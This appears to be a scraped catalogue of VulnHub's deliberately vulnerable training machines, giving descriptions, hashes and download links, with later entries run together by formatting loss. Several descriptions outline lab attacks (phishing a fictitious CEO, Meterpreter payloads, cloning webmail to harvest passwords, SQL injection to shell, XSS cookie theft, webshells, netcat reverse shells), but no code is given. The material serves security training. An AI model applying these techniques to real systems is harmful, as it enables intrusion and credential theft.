On this virtual machine, you will find: a website for a fictitious seafood company, self-contained email infrastructure to receive phishes, and two desktop environments. One desktop environment is a vulnerable Linux client-side attack surface. The other is a vulnerable Windows client-side attack surface. Morning Catch uses a bleeding edge version of WINE to run a few vulnerable Windows applications AND experiment with post-exploitation tools in a fun and freely re-distributable environment.

Your use of Morning Catch starts with the login screen. Boyd Jenius is the Systems Administrator and his password is ‘password’. Login as Boyd to get to the vulnerable Linux desktop. Richard Bourne is Morning Catch’s CEO and his password is also ‘password’. Login as Richard to get to the vulnerable Windows desktop. You can also RDP into the Morning Catch environment.

Richard’s desktop includes the Windows versions of Firefox, Thunderbird, Java, and putty. Open up Thunderbird to check Richard’s email. You can send a phish to him too. This VM includes a mail server to receive email for users at the morningcatch.ph domain. Open up a terminal and find out the IP address of the VM. Make sure you relay messages through this server. Use email protected] as the address.

Are you looking for some attacks to try? Here are a few staples: Spin up a malicious Java Applet and visit it as Richard. The Firefox add-on attack exploit in the Metasploit Framework is a great candidate. Or, generate an executable with your payload and run it as Richard. I’m sure he won’t mind. Morning Catch’s WINE environment runs post-exploitation payloads, to include Windows Meterpreter and Beacon, without too much trouble.

Boyd’s desktop is the vulnerable Linux attack surface. Boyd has the Linux versions of Firefox, Java, and Thunderbird. Boyd also has an SSH key for the Metasploitable 2 virtual machine. Try to ssh to Metasploitable 2 as root and see what happens. Morning Catch also includes RoundCube webmail for all of its users. Use this as a target to clone and harvest passwords from.

Morning Catch isn’t a replacement for a vulnerable Windows lab. It’s a safe and freely redistributable target to experiment with phishing and client-side attacks. It’s my hope that this environment will help more people experiment with and understand these attacks better.

MD5: FE3BC7CD22317A40339BDC1375532C9F
SHA1: E5C85243FD8DB0224AD98697F1BF9DB04677219F
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Hell: 1
Date: 7 Jul 2014
Author: Peleus
Series: Hell
Size: 385 MB
Download: https://download.vulnhub.com/hell/hell.ova

Welcome to the challenge. This VM is designed to try and entertain the more advanced information security enthusiast. This doesn’t exclude beginners however and I’m sure that a few of you could meet the challenge. There is no ‘one’ focus on the machine, a range of skills such as web exploitation, password cracking, exploit development, binary examination and most of all logical thinking is required to crack the box in the intended way - but who knows there might be some short cuts! A few of the skills needed can be seen in some posts on http://netsec.ws. Otherwise enjoy the experience - remember that although vulnerabilities might not jump out at you straight away you may need to try some variations on the normal to get past the protections in place! Feel free to discuss the experience on the #vulnhub irc channel on irc.freenode.net. If you want any hints feel free to PM my nick on there (Peleus). You won’t get any, but I’ll feel all warm and fuzzy inside knowing you’re suffering. Enjoy.

MD5: 2B79041B5A155D1F5DEEF6CD705387DB
SHA1: 5C04A633BFB7B8CEDAEA9B655DD272F979E2F8B7
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Tr0ll: 1
Date: 14 Aug 2014
Author: Maleus
Series: Tr0ll
Size: 434 MB
Download: https://download.vulnhub.com/tr0ll/Tr0ll.rar

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead! Difficulty: Beginner ; Type: boot2root. Special thanks to @OS_Eagle11 and @superkojiman for suffering through the testing all the way to root! The machine should pull an IP using DHCP, if you have any problems, contact me for a password to get it to working. Feedback is always appreciated! @maleus21
MD5SUM (Tr0ll.rar): 318fe0b1c0dd4fa0a8dca43edace8b20

MD5: 318FE0B1C0DD4FA0A8DCA43EDACE8B20
SHA1: 9C459ED10166ACAB9B7D880414A9B0FDDB51F037
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
xerxes: 2.0.1
Date: 4 Aug 2014
Author: Bas
Series: xerxes
Size: 576 MB
Download: https://download.vulnhub.com/xerxes/xerxes2.0.1.tar.gz

Changelog
v2.0.1: 18/08/2014 - Fixes a few typos.
v2: 04/08/2014

MD5: 194FFB610792777F1F83F9BA7B90F4C2
SHA1: 6514215637A8792A79E65B6037AF0DDF541C25F9
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
LAMPSecurity: CTF7
Date: 7 Jan 2013
Author: madirish2600
Series: LAMPSecurity
Size: 709 MB
Download: https://download.vulnhub.com/lampsecurity/CTF7plusDocs.zip

This is the latest of several releases that are part of the LAMP Security project. The other exercises can be found under the ‘Capture the Flag’ folder. Note the PDF doesn’t include the target image. Download the CTF7plusDocs.zip to get the target image as well as the documentation (in PDF format).

MD5: F5502DBC73D1BF42ED29346CABA8D4A3
SHA1: 010722F7AC2D29919C7916BF8DF234D4F2302998
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
LAMPSecurity: CTF8
Date: 3 Jun 2013
Author: madirish2600
Series: LAMPSecurity
Size: 953 MB
Download: https://download.vulnhub.com/lampsecurity/ctf8.zip

ctf8.zip contains the compressed virtual machine target (ctf8.vmdk) as well as the PDF walk through instructions. The latest release fixes some issues with the user cron jobs that check their mail. Earlier versions were prone to memory leaks that would cause the virtual machine to crash unexpectedly.

MD5: 0A785E840CDBF713B6AAF25E4E9F6A25
SHA1: F076CE00EEE8F70CEB0D18D28D0A508CA8DB4B5D
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
CySCA: CySCA2014-in-a-Box
Date: 4 Jun 2014
Author: ASD
Series: CySCA
Size: 367 MB
Download: https://download.vulnhub.com/cysca/CySCA2014InABox.7z

CySCA2014-in-a-Box is a Virtual Machine that contains most of the challenges faced by players during CySCA2014. It allows players to complete challenges in their own time, to learn and develop their cyber security skills. The VM includes a static version of the scoring panel with all challenges, required files and flags.

To use CySCA2014 in a box virtual machines, players will need to have either Oracle VirtualBox or VMWare Player installed on their machines. Additionally we recommend players have at least 4GB of RAM. If you have less RAM, you can reduce the amount of RAM available to the VM down to 512MB, however it may adversely affect the speed of some of the challenges.

MD5: 70309E43FDCBC8180DE7DEC5573B41F4
SHA1: CAFA867EB5A072BE5EE7A23D36165415735B4648
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
SecOS: 1
Date: 12 May 2014
Author: PaulSec
Series: SecOS
Size: 599 MB
Download: https://download.vulnhub.com/secos/SecOS-1.tar.gz

Not too tired after BSides London? Still want to solve challenges? Here is the VM I told you about during my talk where you’ll have to practice some of your skills to retrieve the precious flag located here: /root/flag.txt. This VM is an entry-level boot2root and is web based.

This VM is the first of a series which I’m currently creating where there will be links between all of them. Basically, each machine in the series will rely/depend on each other, so keep the flags for the next VMs. This has been tested on VirtualBox and gets its IP from the DHCP server. Moreover, if you find yourself bruteforcing, you’re doing something wrong. It is not needed and it wasn’t designed to be done this way. Instead, focus on exploiting web bugs! If you have any questions, feel free to ask me on Twitter @PaulWebSec or throw me a mail: paulwebsec(at)gmail(dot)com

MD5: E8C01AB49B98926A37F79E2EA414CFC5
SHA1: F542F7B1DD925D7B21327CAC6524AFAB088CD7ED
Format: Virtual Machine (Virtualbox - VDI)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Bot Challenges: LoBOTomy
Date: 5 Jun 2014
Author: bwall
Series: Bot Challenges
Size: 1.5 GB
Download: https://download.vulnhub.com/botchallenges/LoBOTomy.zip

I always enjoy creating and releasing vulnerable virtual machines so readers can get a first hand feel of attacking these command and control panels without doing anything illegal. The objective of this vulnerable virtual machine is to get a root shell. The root credentials (for network configuration purposes) are root:password. These credentials are not part of a solution and it is intended that the vulnerable virtual machine be attacked remotely. You can download the LoBOTomy vulnerable virtual machine here.

MD5: 2E33DD5F37BE9FFE366FF579F5DC2E4D
SHA1: B1F04642CA917A154CF921D29C44B958C0988C74
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: Play Session Injection
Date: 14 Jul 2014
Author: Pentester Lab
Series: Pentester Lab
Size: 99 MB
Download: https://download.vulnhub.com/pentesterlab/play_session_injection.iso

Beginner. This exercise covers the exploitation of a session injection in the Play framework.

MD5: 6B459DD8BBDC10DBA6CB3D3E69B1502F
SHA1: 619C9F16B54BCB672D9BD9341DB5CC3B2331B040
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Flick: 1
Date: 8 Aug 2014
Author: Leonjza
Series: Flick
Size: 884 MB
Download: https://download.vulnhub.com/flick/flick.tar.gz

VMware import will work, after clicking “retry” to relax the ova format. If after the retry VMware crashes, simply run “ovftool --lax flick.ova flick.vmx” to convert the ova to a VMware format and import the resultant vmx.

MD5: FE2AB06A7EF99BC15E1BA3FE0E94890E
SHA1: 488D6BE83F61F244AFEB40CA5970C7A490E40A51
Format: Virtual Machine (Virtualbox - OVA)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: CVE-2007-1860: mod_jk double-decoding
Date: 17 Apr 2014
Author: Pentester Lab
Series: Pentester Lab
Size: 191 MB
Download: https://download.vulnhub.com/pentesterlab/cve-2007-1860_i386.iso

Beginner. This exercise covers the exploitation of CVE-2008-1760. This vulnerability allows an attacker to gain access to inaccessible pages using crafted requests. This is a common trick that a lot of testers miss.

MD5: 0A06A7C4521B4B5C842E90F2DE9E4F3C
SHA1: F059274CC6E03C7C5CFDDB1E181C1F15EBAF32CF
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
LAMPSecurity: CTF6
Date: 29 Jun 2009
Author: madirish2600
Series: LAMPSecurity
Size: 425 MB
Download: https://download.vulnhub.com/lampsecurity/ctf6.zip

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/).

These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.

MD5: 36208CE8AF7EF9A04541FCD8EF2E8D7A
SHA1: ABEE9A3017D576C54A3FBD2E0D6DA10F42332C83
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: Introduction to Linux Host Review
Date: 22 Oct 2012
Author: Pentester Lab
Series: Pentester Lab
Size: 184 MB
Download: https://download.vulnhub.com/pentesterlab/linux_host_review_i386.iso

Beginner. This exercise explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog.

MD5: A78AC9FE2B2081370108B23CBE9FCDB0
SHA1: 48AAF03CB8F57E2018FEC132A45C276F21EEBF6F
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
LAMPSecurity: CTF5
Date: 10 May 2009
Author: madirish2600
Series: LAMPSecurity
Size: 1017 MB
Download: https://download.vulnhub.com/lampsecurity/ctf5.zip

This is the fifth capture the flag exercise. It includes the target virtual machine image as well as a PDF of instructions. The username and password for the target are deliberately not provided! The idea of the exercise is to compromise the target WITHOUT knowing the username and password. Note that there are other capture the flag exercises. If you like this one, download and try out the others. If you have any questions e-mail me at justin AT madirish DOT net

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/). These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.

MD5: 159A25442061DB6F82F1B873F04E2375
SHA1: E629F854BB1A823F9611DB5FA720174DE3AE2E69
Format: Virtual Machine (VMware)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: From SQL injection to Shell
Date: 13 Sep 2012
Author: Pentester Lab
Series: Pentester Lab
Size: 169 MB
Download: https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

Beginner. This exercise explains how you can gain access to the administration console from a SQL injection. Then, in the administration console, how you can run commands on the system.

MD5: 9221158D81B826034B3B8E3D3FC8EC68
SHA1: F1BE03CACE56F7951AC5A91BF43353289BE90813
Format: Disk Image (.ISO)
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Command Injection ISO: 1
Date: 7 Apr 2014
Author: Pentester Academy
Series: Command Injection ISO
Size: 1.5 GB
Download: https://download.vulnhub.com/commandinjectioniso/Command_Injection_OS.zip

We’ve packaged 10 real world applications into an Ubuntu Desktop based ISO. These applications are vulnerable to command injection attacks which you will need to find and exploit. Please note that not all applications are on port 80 😃 All the best!
Username: securitytube
Password: 123321

MD5: 35747567C885BC72080F1107D3205A57
SHA1: 80FAA5DED0F892DC786D4463DE8694CC82577A61
Operating System: Linux
DHCP service: Enabled
IP address: Automatically assign
Pentester Lab: PHP Include And Post Exploitation19 Apr 2012Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation_i386.isoBeginnerThis exercise describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. PHP include Reverse shell with netcat TCP redirection with socatA5413A548CF80D56D117C0C3AB47CCCADE23E5B7A92FC69F41851C43B6398CFB092DDA72Disk Image (.ISO)LinuxEnabledAutomatically assign
LAMPSecurity: CTF410 Mar 2009madirish2600LAMPSecurity491 MBhttps://download.vulnhub.com/lampsecurity/ctf4.zipUpdated to set default runlevel to 3 (no X windows) and fixed DHCP.This is the fourth capture the flag exercise. It includes the target virtual machine image as well as a PDF of instructions. The username and password for the target are deliberately not provided! The idea of the exercise is to compromise the target WITHOUT knowing the username and password. Note that there are other capture the flag exercises. If you like this one, download and try out the others. If you have any questions e-mail me at justin AT madirish DOT net. The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available (http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/). These exercises can be used for training purposes by following this documentation. Alternatively you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.8DBE28D5F886BBDE6103317C4B1C195F3680FB770282ECDD90168C484E61B635079E6C48Virtual Machine (VMware)LinuxEnabledAutomatically assign
Pentester Lab: From SQL injection to Shell: PostgreSQL edition7 Dec 2012Pentester LabPentester Lab161 MBhttps://download.vulnhub.com/pentesterlab/from_sqli_to_shell_pg_edition_i386.isoBeginnerThis exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. If you didn’t go through From SQL injection to shell, you should start there and move to this exercise later.D6C1AA6F437ED2D5C0F66CCB2BC896B0A88E1E1217D2D3743F7737BBA7C47CE68125BCC3Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-1823: PHP CGI29 May 2012Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-1823.isoBeginnerThis exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. Exploiting CVE-2012-1823 Details on PHP security features302299AB1AFDCAB3BB26D88D0D3FF9C4ED9C2E8A778AF226D6908EB560ACF5038B4F88E5Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-2661: ActiveRecord SQL injection12 Jun 2012Pentester LabPentester Lab330 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-2661_i386.isoAdvancedThis exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database.45F7408ED83F5C152CEE983134C2343E4C4DA9968C1D4C07A462CD1AF48EC350B9B87A57Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Rack Cookies and Commands Injection2 Oct 2012Pentester LabPentester Lab317 MBhttps://download.vulnhub.com/pentesterlab/rack_cookies_and_commands_injection_i386.isoIntermediateAfter a short brute force introduction, this exercise explains the tampering of a Rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain command execution.3AB2F16009BFE8F37AA45EDA636E5FE8E5C8DD2C48B608AACF3BAC8F291872092BFBACE2Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability7 Dec 2012Pentester LabPentester Lab170 MBhttps://download.vulnhub.com/pentesterlab/cve-2008-1930_i386.isoBeginnerThis exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation.D5C658FE22878E9EEECDB3AE33EE8B624890C6595FD2B8B0348CE17D3DD926DA9DC42415Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: CVE-2012-6081: MoinMoin code exec24 Apr 2013Pentester LabPentester Lab162 MBhttps://download.vulnhub.com/pentesterlab/cve-2012-6081_i386.isoAdvancedThis exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian’s wiki and Python documentation websiteF860AA584C355F5E91E21E2519AB4A74EFA569E0183D5668A163784AD7279BAB38DF4DF9Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: XSS and MySQL FILE29 Jan 2014Pentester LabPentester Lab178 MBhttps://download.vulnhub.com/pentesterlab/xss_and_mysql_file_i386.isoBeginnerThis exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator’s cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it.C9C7A31AB9BF79B82B72B58BB0A3A6578B8D7019194A14DADC16A605D9731A080E9E0C6ADisk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Web For Pentester26 Mar 2013Pentester LabPentester Lab172 MBhttps://download.vulnhub.com/pentesterlab/web_for_pentester_i386.isoBeginnerThis exercise is a set of the most common web vulnerabilities:More information: http://web-for-pentester.pentesterlab.com/71F87B676AD51B541AA23EABB95F9A57375080138AC2AD438FA66F0088A16A6D66C1F5A6Disk Image (.ISO)LinuxEnabledAutomatically assign
Kioptrix: 2014 (#5)6 Apr 2014KioptrixKioptrix787 MBhttps://download.vulnhub.com/kioptrix/kiop2014.tar.bz2As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard. Also, before powering on the VM I suggest you . For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go. This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms. Kioptrix VM 2014 download 825Megs MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432 Waist line 32"Works out of the box with VMware workstation 10, player 6, fusion 6(Can edit the vmx file to force a downgrade for an older version - see ‘kiop2014_fix.zip’).Has been known to work with Virtualbox 4.3 or higher…First thing: try setting it to a x64 machine.Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.1F802308F7F9F52A7A0D973FBDA22C0A116EB311B91B28731855575A9157043666230432Virtual Machine (VMware)BSDEnabledAutomatically assign
Exploit-Exercises: Mainsequence (v1)29 Jan 2013Exploit-Exercises.comExploit-Exercises593 MBhttps://download.vulnhub.com/exploitexercises/exploit-exercises-mainsequence-fabled-scorpion.isoThe Main Sequence images were used as the Ruxcon 2012 CTF challenge. They covered a variety of situations such as:For more information, see here: http://exploit-exercises.com/mainsequence/setupCE3F9D113571B4E48B218EEB598862DCD8B25DE5CFA599BCBD5C3783759E4113467472FBDisk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Axis2 Web service and Tomcat Manager15 Jan 2013Pentester LabPentester Lab221 MBhttps://download.vulnhub.com/pentesterlab/axis2_and_tomcat_manager_i386.isoIntermediateThis exercise explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain command execution.2136A9D0118CAB84B2D1B6CDBAEC01A040E6FA8F918CA36FCB65E1D2C0156434524D1C01Disk Image (.ISO)LinuxEnabledAutomatically assign
No Exploiting Me: 12 Sep 2013bwallNo Exploiting Me365 MBhttps://download.vulnhub.com/noexploitingme/NoExploitingMe.vdi.7zVulnerable VM with some focus on NoSQLThis vulnerable VM is meant to act as a practice virtual machine for security researchers to start looking at identifying and exploiting vulnerabilities in NoSQL, PHP and the underlying OS (Debian).6415AA6E4E50FD60C520C705348A881B82DE1AF01F9E67F7BE1897E68040CD580A41C270Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Pentester Lab: From SQL injection to Shell II12 Jun 2013Pentester LabPentester Lab170 MBhttps://download.vulnhub.com/pentesterlab/from_sqli_to_shell_II_i386.isoIntermediateThis exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell8434D28A36562B2A2F94B4753036DF7F9013F8B035C751D29EE20A704F5E5B65C1856719Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Electronic CodeBook (ECB)18 Nov 2013Pentester LabPentester Lab169 MBhttps://download.vulnhub.com/pentesterlab/ecb_i386.isoBeginnerThis exercise explains how you can tamper with an encrypted cookie to access another user’s account.A7114704FE356B9538DAB4E2274F7981B9CE6932CEB90B1885FB8CF1CDBA2657BB8BB9A3Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Web For Pentester II15 Jul 2013Pentester LabPentester Lab355 MBhttps://download.vulnhub.com/pentesterlab/web_for_pentester_II_i386.isoBeginnerThis exercise is a set of the most common web vulnerabilities:048A318B9F4F496BC632E4B89F57832FF193A7589A92F178BA0B15880FF12E5819BD800ADisk Image (.ISO)LinuxEnabledAutomatically assign
Web Security Dojo: 226 Jul 2012Maven SecurityWeb Security Dojo1.4 GBhttps://download.vulnhub.com/websecdojo/Web_Security_Dojo-2.0.ovaA free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo[Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.2, which is patched with the appropriate updates and VM additions for easy use. The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for self-teaching and skill assessment, as well as training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started – tools, targets, and documentation. Download Web Security Dojo from http://sourceforge.net/projects/websecuritydojo/files/ . To install Dojo you first install and run VirtualBox 3.2 or later, then “Import Appliance” using the Dojo’s OVF file. We have PDF or YouTube for instructions for Virtualbox. As of version 1.0 a VMware version is also provided, as well as video install instructions Sponsored by Maven Security Consulting Inc (performing web app security testing & training since 1996). Also, could be you! Web Security Dojo is an open source and fully transparent project, with public build scripts and bug trackers on Sourceforge . Look for Dojo videos on our YouTube channel at http://www.youtube.com/user/MavenSecurity Hack your way to fame and glory 1 with our security challenges posted at Reddit (http://www.reddit.com/r/WebSecChallenges/). 1. Fame and glory not included; void where prohibited by law]67312CD0F991F5AA09FBAAFC3D318BD98A0F5159BCBF9018819836D9B5954AD6486710E5LinuxEnabledAutomatically assign
Bot Challenges: Flipping Bitbot20 Aug 2013bwallBot Challenges359 MBhttps://download.vulnhub.com/botchallenges/Bitbot.VulnVM-disk1.vmdk.7zThis is a Linux based VM that is intended as a way to get security researchers started with simple botnet research. It also requires the researcher have some ability to assess and exploit vulnerabilities, with the ultimate goal of obtaining root access to the VM. This is the second of many to come, please feel free to supply feedback so I can make future ones more enjoyable and fulfilling.The network configuration of the VM is set to auto, so it is easiest to run with some sort of DHCP server on the same network(or just select the NAT option in your virtualization software). It is suggested that you use the NAT option along with port forwarding, but as long as you have TCP access to the VM, you should be fine. There are no supplied credentials, and it is intended that the network services on the VM are the attack vectors. If you have questions, feel free to ask in #vulnhub on freenode(I’m bwall on there). You can also ask me on Twitter(@botnet_hunter). You can also email me at bwall(at)ballastsecurity.netThere is an update to ‘bot.py’ that is found on the VM. You can find the updated version, here: https://gist.github.com/bwall/710624552AC771CE8703D9B35090D8826990118AFF4B8F59ACB2C8C34C7B322C06F1A02Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Bot Challenges: RA1NXing Bots7 Jul 2013bwallBot Challenges547 MBhttps://download.vulnhub.com/botchallenges/RA1NXing_Bots.zipThis is a Linux based VM that is intended as a way to get security researchers started with simple botnet research. It also requires the researcher have some ability to assess and exploit vulnerabilities, with the ultimate goal of obtaining root access to the VM.The network configuration of the VM is set to auto, so it is easiest to run with some sort of DHCP server on the same network(or just select the NAT option in your virtualization software). It is suggested that you use the NAT option along with port forwarding, but as long as you have TCP access to the VM, you should be fine. If you have questions, feel free to ask in #vulnhub on freenode(I’m bwall on there).0806DDAE7C34447ED590A5358F33DC70DDF943AC009B73314FEDD55D43D9CBDA6D7784C3Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
HackLAB: VulnVPN8 Feb 2013Reboot UserHackLAB1.2 KBhttps://download.vulnhub.com/hacklab/client.7zThe idea behind VulnVPN is to exploit the VPN service to gain access to the server and ‘internal’ services. Once you have an internal client address there are a number of ways of gaining root (some easier than others).I have created/uploaded the relevant files which can be obtained from the compressed file here. You’ll need to configure Openswan/xl2tpd on your system, if you’re using an Ubuntu based Linux variant you can follow the below steps – please note that I’ve used Backtrack 5r3 for all client testing (mentioned as I know it works well): Note: If you change your configuration/IP settings etc you’ll need to reload the relevant configuration files i.e. /etc/init.d/ipsec restart and/or /etc/init.d/xl2tpd restart I realise that VPNs can be very troublesome (setting this challenge up was bad enough), so I have allowed access to auth and ufw logs. These should help highlight issues you may be experiencing and can be found at (note port 81). Please note that hacking this page and associated scripts are not part of the challenge, rather they have been provided for assistance. A useful config reference can also be found here: https://wiki.archlinux.org/index.php/L2TP/IPsec_VPN_client_setup Architecture: x86 Format: VMware (vmx & vmdk) compatibility with version 4 onwards RAM: 1GB Network: NAT – Static IP (no G/W or DNS configured) Extracted size: 1.57GB Compressed (download size): 368MB – 7zip format – 7zip can be obtained from here Download VulnVPN from -HERE- MD5 Hash of VulnVPN.7z: 9568aa4c94bf0b5809cb0a282fffa5c2 Download Client files from -HERE- MD5 Hash of client.7z: e598887f2e4b18cd415ea747606644f6 As per usual, I shall add a related solutions post shortly. Until then, enjoy Source:E598887F2E4B18CD415EA747606644F6B4396A556E8879E4189B504F6B12F6064A2FA91AVirtual Machine (Virtualbox - VDI)LinuxDisabled192.168.0.10
bWAPP: bee-box (v1.6)2 Nov 2014Malik MesellembWAPP1.2 GBhttps://download.vulnhub.com/bwapp/bee-box_v1.6.7zTraining page: http://www.mmeit.be/en/bwapp_training.htmBlog page: http://itsecgames.blogspot.co.uk/2013/07/bee-box-hack-and-deface-bwapp.htmlThe original release of ‘bee-box (v1.3)’ came out on the 2014-April-19, however, there was an issue extracting it: https://twitter.com/MME_IT/status/457980827281158144.Replacement release came out on the 2014-April-21 (same filename).305AB48FB11BCFD662B0E2F1771DB1DA4D87BC5F105B0372E95BC4623941323AC9EFF525Virtual Machine (VMware)LinuxEnabledAutomatically assign
/dev/random: relativity (v1.0.1)16 Nov 2013Sagi-/dev/random612 MBhttps://download.vulnhub.com/devrandom/relativity_1.0.1.zipv1.0.1 ~ 2013-11-29 Fixed a few bugs when using VirtualBox (thanks to Bas van den Berg - @barrebas)v1.0 ~ 2013-11-16 Public release v0.0 ~ 2013-11-01 Private release - Zacon v0.0 ~ 2013-06-29 Private release - HackFuExclusive to VulnHub!v1.0.1MD5: 0592CAA80495B4A7B3F6CE2DBCEA3776SHA1: 3C3BD6F5FA32EF43AD71CF699FDEE603DBD0913Cv1.0MD5: 3D141EE6A9087A1C2D01078B041B167ASHA1: D1335602963871B1283199EACAA62EAF28ABB17D0592CAA80495B4A7B3F6CE2DBCEA37763C3BD6F5FA32EF43AD71CF699FDEE603DBD0913CVirtual Machine (VMware)LinuxEnabledAutomatically assign
xerxes: 127 Dec 2013Basxerxes443 MBhttps://download.vulnhub.com/xerxes/xerxes.tar.gzExclusive to VulnHub!** (Private) beta release information **Date: 2013-12-20Size: 434MMD5: 00e656b5cca5131c5606c72ab682b7fbSHA1: 7281e779e134a63f2addeebb81f36573f947ba3022B49B2B8FDE59680197BBD009E174A963D9DB7444E9B1114D00D4BE633DFC540DAECE9BVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
VulnOS: 122 Mar 2014c4b3rw0lfVulnOS1.3 GBhttps://download.vulnhub.com/vulnos/VulnOS.vdi-vbox.7zWelcome to VulnOS !This is my first vulnerable target I made because I want to give back something to the community. Big up for the community that made things possible!!! Your goal is to get root and find all the vulnerabilities inside the OS ! It is a ubuntu server 10.04 LTS (that’s been made very buggy!!!) DO NOT USE This Box in a production environment!!! It’s a VM that has been made with Virtualbox 4.3.8 - so it’s in the .vdi format. Networking : This box has been made with bridged networking and uses DHCP to get an IP address (was when I built it). So it is best to share the attack OS and the TARGET BOX to IP-Range OF Maybe you could set it up with m0n0wall and setup static IP-addresses. If you cannot find the target’s IP ADDRESS, contact me @ blakrat1 AT gmail DOT com I will give you the root user and password to login… Hope you find this useful !!!Exclusive to VulnHub!022A4223ADB2ECDC7FE696A1B791BF7A3248559627AF4837A3689444E0537EB272DA6AE9Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Brainpan: 120 Mar 2013superkojimanBrainpan809 MBhttps://download.vulnhub.com/brainpan/Brainpan.zipSource: Brainpan.zip/readme.txtSource: Brainpan.zip/md5.txtExclusive to VulnHub!0F99E72F0703E4619B5E08604778F673E424613FD0137C0688A865623CCBB4D92DFE8209Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
